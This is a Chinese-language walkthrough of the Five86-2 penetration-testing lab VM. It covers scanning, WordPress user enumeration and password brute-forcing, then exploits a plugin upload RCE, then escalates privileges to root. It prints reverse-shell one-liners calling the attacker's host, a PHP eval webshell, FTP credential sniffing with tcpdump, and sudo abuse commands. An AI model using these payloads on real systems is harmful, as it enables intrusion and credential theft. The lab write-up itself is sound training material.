渗透测试学习之靶机Five86-2

2022年01月14日 阅读数:2
这篇文章主要向大家介绍渗透测试学习之靶机Five86-2,主要内容包括基础应用、实用技巧、原理机制等方面,希望对大家有所帮助。
过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,获得目标主机IP:192.168.246.148
在这里插入图片描述php

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.148
    在这里插入图片描述
  • web站点相关服务信息
    css加载不出来,奇怪…
    在这里插入图片描述
  • 目录信息
    使用dirb,看一下有无敏感文件:
    dirb http://192.168.246.148
    在这里插入图片描述
    试图访问http://192.168.246.148/wp-admin/,而后出现这个:
    在这里插入图片描述
    设置下hosts文件:在C:\Windows\System32\drivers\etc的hosts文件中增长192.168.246.148 five86-2
    而后再访问看看:
    在这里插入图片描述
    正常了,回到访问http://192.168.246.148,页面也正常显示了:
    在这里插入图片描述
  • 枚举用户
    使用wpscan枚举下用户名:
    wpscan --url http://192.168.246.148 -e u
    在这里插入图片描述
    而后对这5个user进行爆破,仍是使用wpscan:
    wpscan --url http://five86-2 -P /usr/share/wordlists/rockyou.txt -U /root/Desktop/user.txt
    rockyou.txt是个很大的字典,跑完要很久,就不等了,让它跑着,而后先直接用大佬们跑出来的结果连接
    跑到和大佬们同样结果暂停了:
    在这里插入图片描述
    barney spooky1
    stephen apollo1
3. 登陆用户,插件漏洞getshell

使用前面的用户密码登陆,查看信息:
barney用户下有个active状态的插件,直接搜一下这个名字,有rce的字样:
在这里插入图片描述
在这里插入图片描述
连接
👆看一下内容,版本对应上了,有利用方法:
在这里插入图片描述
将html和php压缩,而后上传:
在这里插入图片描述
在这里插入图片描述
上传:
在这里插入图片描述
点击右上角的publish:
在这里插入图片描述
而后监听138上的8888端口,访问five86-2/wp-content/uploads/articulate_uploads/xiaoLin6/xiaoLin.php
在这里插入图片描述
可以输出先后的1和2,可是8888没接到反弹…
system不能执行吗仍是没有nc??…换成php版
$sock=fsockopen("192.168.246.138",8888);exec("/bin/sh -i <&3 >&3 2>&3");
在这里插入图片描述
在这里插入图片描述
访问five86-2/wp-content/uploads/articulate_uploads/xiaoLin7/xiaoLin.php
在这里插入图片描述
一会儿断开…
再试一个:
<?php system('bash -i >& /dev/tcp/192.168.246.138/8888 0>&1');?>
在这里插入图片描述
没反应…
仍是传个一句话,而后蚁剑连一下吧,顺便把压缩包的名字改一下,或许是这个缘由
<?php @eval($_POST['xl']);?>
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
一会儿进来了…
两个虚拟机cpu太满了,仍是弹回shell吧,用大佬姿式,传个php版的弹shell,而后在虚拟终端中执行参考文章
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述css

4. 提权

权限低,切换下用户,使用以前爆破的用户密码试下:
su stephen
apollo1
这个用户进去了,
在这里插入图片描述
获取交互式shell,python不行,python3能够:
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看系统进程:
ps -auxwww
在这里插入图片描述
前面端口信息存在ftp,用户paul在使用,能够获取ftp的明文信息:
使用tcpdump:
tcpdump -D查看可监听的接口,8个…
在这里插入图片描述
监听veth4fa8b8e 21端口,tcpdump -i veth4fa8b8e port 21 -nn -v
在这里插入图片描述
过一会发现PASS,切换用户到paul,我只能退出重回蚁剑去getshell,再切了:
在这里插入图片描述
可使用peter权限免密执行service,能够得到peter权限:
sudo -u peter service ../../bin/bash
在这里插入图片描述
可使用root权限执行/usr/bin/passwd,用来修改root的密码,而后登陆root:
sudo -u root /usr/bin/passwd root
在这里插入图片描述
切换到root,进入root目录下就能够了:
在这里插入图片描述html

总结